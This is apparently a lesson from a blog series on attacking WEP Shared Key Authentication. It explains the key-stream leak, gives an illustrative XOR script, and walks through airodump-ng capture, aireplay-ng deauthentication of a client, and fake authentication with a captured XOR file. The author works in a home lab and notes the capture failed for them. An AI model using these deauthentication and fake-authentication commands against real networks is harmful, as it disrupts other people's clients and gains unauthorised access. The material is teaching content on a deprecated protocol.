Things are starting to get a bit more interesting now and I hope you are enjoying this series so far as much as I am writing about it.
Shared Key Authentication (SKA) uses a shared secret which you can think of as a password that allows you to connect to and authenticate with the access point from the client.
The exchange of information can be seen in the diagram below:
What you see above is the client sending an authentication request to the access point, which responds with a challenge. The client then has to encrypt the challenge with the shared key and send it back to the access point, which decrypts it to check whether it can recover the original challenge text. If it is successful the client is authenticated; otherwise the access point sends an authentication failed message.
The downfall here is that an attacker can passively listen to the entire exchange while sniffing the air, because both the plain text challenge and the encrypted challenge can be seen. XORing the two together recovers the key-stream, and that key-stream can then be used to encrypt any future challenge sent by the access point without needing to know the key.
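To make the weakness concrete, here is an added illustration (not code from the original post) of why the challenge/response pair leaks the key-stream. The key-stream and challenges are constructed stand-ins rather than real RC4 output, but the XOR relationship is exactly what WEP shared key authentication exposes, and the same recovered bytes also cover the CRC-32 ICV that WEP appends before encryption.

```python
import zlib

CHALLENGE_LEN = 128  # 802.11 shared key challenge text is 128 bytes
ICV_LEN = 4          # WEP appends a CRC-32 integrity check value


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR of two equal-length byte strings."""
    assert len(a) == len(b)
    return bytes(x ^ y for x, y in zip(a, b))


def wep_icv(plaintext: bytes) -> bytes:
    """CRC-32 over the plaintext, little-endian, as WEP appends it."""
    return zlib.crc32(plaintext).to_bytes(ICV_LEN, "little")


def wep_encrypt_challenge(keystream: bytes, challenge: bytes) -> bytes:
    """What the client sends back: (challenge || ICV) XOR RC4 key-stream."""
    return xor_bytes(keystream, challenge + wep_icv(challenge))


def recover_keystream(plain_challenge: bytes, encrypted_response: bytes) -> bytes:
    """A passive listener who saw both packets recovers the key-stream by XOR.

    The ICV is a public function of the plaintext, so the listener can
    compute it too and recover all 132 key-stream bytes, never the key.
    """
    return xor_bytes(plain_challenge + wep_icv(plain_challenge), encrypted_response)


def demo() -> bool:
    """Constructed example: one observed exchange leaks enough to answer any
    later challenge of the same length, provided the same IV (and therefore
    the same key-stream) is reused."""
    # Constructed stand-ins; real RC4 output depends on the secret key and IV.
    keystream = bytes((i * 73 + 11) & 0xFF for i in range(CHALLENGE_LEN + ICV_LEN))
    challenge_1 = bytes((i * 31 + 7) & 0xFF for i in range(CHALLENGE_LEN))
    response_1 = wep_encrypt_challenge(keystream, challenge_1)

    recovered = recover_keystream(challenge_1, response_1)

    # A new challenge from the access point: the recovered key-stream answers it.
    challenge_2 = bytes((i * 17 + 3) & 0xFF for i in range(CHALLENGE_LEN))
    forged = wep_encrypt_challenge(recovered, challenge_2)
    return recovered == keystream and forged == wep_encrypt_challenge(keystream, challenge_2)
```

This is the reason shared key authentication is considered weaker than open system authentication on WEP: the handshake itself hands a passive observer a reusable key-stream, and the only real fix is moving off WEP altogether.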
Doing what we have done in the previous lessons, we are going to put the card into monitor mode and start airodump-ng in order to sniff the air around us and capture the challenge, the encrypted challenge and the key-stream, so that we can then use it to authenticate with the access point without knowing the shared key.
On the router, keep the previous settings but remove the MAC filtering, and this time enable WEP with Shared Key Authentication like in the image below:
First things first, you already have the card in monitor mode, don't you? So let's start up airodump-ng sniffing packets between the access point and the target client, but this time we are also going to save them using the "-w" option to write to a file for later use.
airodump-ng mon0 -c 6 --bssid AP_MAC -w SKA_out
This will start airodump-ng on interface "mon0" set to channel 6, filtered to the access point MAC given after "--bssid", and write to a file with the "-w" option. The file is called SKA_out here but you can name it whatever you want, and you can then reuse these packets and analyze them further. You could have done this in the previous lessons too, but I didn't want to hit you with too much at the start.
Once you have run airodump-ng you will see output similar to the following.
Notice that under "AUTH" there is currently nothing specified; only two values can appear here, "SKA" or "PSK". We can see however that a client is currently attached to this access point, and we can either de-authenticate the client in order to force it to reconnect, or wait for a client to connect manually and capture the same exchange passively.
Let's de-authenticate the client in order to speed up this process. It's always handy to have Wireshark open as well, so you can look at what may have gone wrong if things aren't going as expected; it's a good habit to get into.
aireplay-ng -0 1 -a 00:18:E7:XX:XX:XX -c F4:09:D8:XX:XX:XX mon0
“-0” – means deauthentication
“1” – is the number of deauths to send (feel free to increase this!)
“-a 00:18:E7:XX:XX:XX” – is the MAC address of the access point
“-c F4:09:D8:XX:XX:XX” – is the MAC address of the client you are deauthing
"mon0" – is the interface name
Now if you return to the airodump-ng instance you left running, you should see some changes to your output:
Looking above you now see "Broken SKA:" followed by the access point MAC address, and "AUTH" has also changed to "SKA" for Shared Key Authentication. You can stop airodump-ng now and look at the packets with Wireshark to see what you have obtained.
Running "ls" in your directory you will see the files airodump-ng has created for you:
Having a closer look, things are unfortunately not as they should be at this stage, as a key-stream should have appeared where it says "Broken SKA:". Looking in Wireshark it appears there is an issue here, for me anyway, which I am not going to dwell on for very long as there are other ways to get around WEP. I have tried a few cards and different APs with the same result, and I have also found some tickets for this, so it may be a bug in airodump-ng.
Start Wireshark on the capture with the following command to load it directly into Wireshark for you, handy isn't it!
wireshark name_of_cap.cap &
In Wireshark use the following filter to see the exchange take place:
(wlan.addr == 00:18:E7:XX.XX.XX) && (wlan.fc.type_subtype == 0x0b)
Let's break down each packet a bit further to see what is going on here.
Packet 1: Authentication request, with 11 bytes of Vendor Specific information attached.
Packet 2: Challenge text is sent.
Packet 3: Packet 3 here is interesting, as under the WEP parameters the WEP ICV shows as not verified. This is due to the ICV not being encrypted; it is just a CRC-32 check that is appended to the end of the frame, based on the encrypted payload. Now I have tried spoofing the MAC etc. and the only way I seem to be able to get around this is to use a different attack method, which you will see soon. The data is the encrypted text.
Packet 4: Rather than focus and obsess on this for too long I am going to move on to further tutorials, but if you were to obtain a XOR file here you could then replay it with the following command and authenticate without knowing the PSK, which was the reason behind this lesson, and obtain a fake authentication with the access point.
aireplay-ng -1 0 -e test -y sharedkey.xor -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 mon0
“-1” means fake authentication
“0” means only authenticate once
“-e test” is your access point SSID
“-y sharedkey.xor” is the name of file containing the PRGA XOR bits captured by airodump
“-a 00:18:E7:XX:XX:XX” is your access point MAC address
“-h F4:09:D8:XX:XX:XX” is your MAC address on your card
“mon0” is the interface name
Let me know if you have difficulty here also, as I have searched myself and can find very little on this subject that leads to an answer anyway; this is quite possibly a bug in airodump-ng but I could be wrong. If you have a similar issue please leave a comment. I may come back to this again in the future but don't really see the point unless I stumble across this on one of my other routers, so for now let's just move on to the next lesson and crack the WEP key of this access point by trying some alternative methods.
To look at a successful pcap, refer to the following download link from the aircrack-ng site; you will see it does not include the additional 11 bytes that mine does above.